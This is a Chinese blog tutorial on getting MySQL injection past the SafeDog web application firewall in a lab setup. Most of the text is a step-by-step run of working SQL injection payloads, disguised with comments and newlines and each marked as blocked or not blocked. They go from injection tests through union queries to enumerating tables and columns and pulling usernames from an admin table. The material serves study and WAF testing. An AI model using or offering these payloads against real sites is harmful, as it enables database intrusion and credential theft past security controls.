从0开始ByPass之Mysql注入篇 从0开始ByPass之Mysql注入篇

从0开始ByPass之Mysql注入篇

前言

在做项目中遇到各种各样waf,跟着本文系列一起学习bypass。

安装

环境:win+PHPstudy+安全狗

过程

安装phpstudy需要以系统模式启动,否则安全狗无法识别安装防护插件。

 

 

 

进入主题

  1. 判断注入:

and 1=1 拦截

and -1=-1拦截

and /*/ /-- /*/1=1 不拦截

 

2.order by:

order by 1 拦截

 

order/*//*/ by 1 不拦截

 

3.联合查询

and 1=2 union select 拦截

 

注释+换行符绕过

 and /*/%0A*a*/1=2 union/*/ /-- /*/select 1,2 不拦截

 

4.爆库:

and /*/%0A*a*/1=2 union/*/ /-- /*/select%201,database() 拦截

and /*/%0A*a*/1=2 union/*/ /-- /*/select%201,database/*/ /-- /*/()不拦截

 

5.爆表:

用以上方法bypass绕过

/*!and*/ /*/%0A*a*/1=2 /**//**/union/*/ /-- /*/ /*/%0A*a*/select 1,table_name /*!from--/*information_schema.tables*/ /*//*/where table_schema=/*!database*//*/ /-- /*/() limit 0,1 不拦截

 

5.获取列名

%20/*!and*/%20/*/%0A*a*/1=2%20/**//**/union/*/%20/--%20/*/%20/*/%0A*a*/select%201,column_name%20/*!from--%0F/*%0Ainformation_schema.columns*/%20/*//*/where%20table_schema=/*!database*//*/%20/--%20/*/()%20limit%200,1 不拦截

 

6.获取字段:

union/*/%20/--%20/*/select%201,/*!username*/%20/*//*!--+*/from%20admin%20limit%201,1

 

总结

手法采用了大量注释+换行来达到bypass效果。

如文中有误请不吝指正

参考文献

https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI

评论 0

挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
sitemap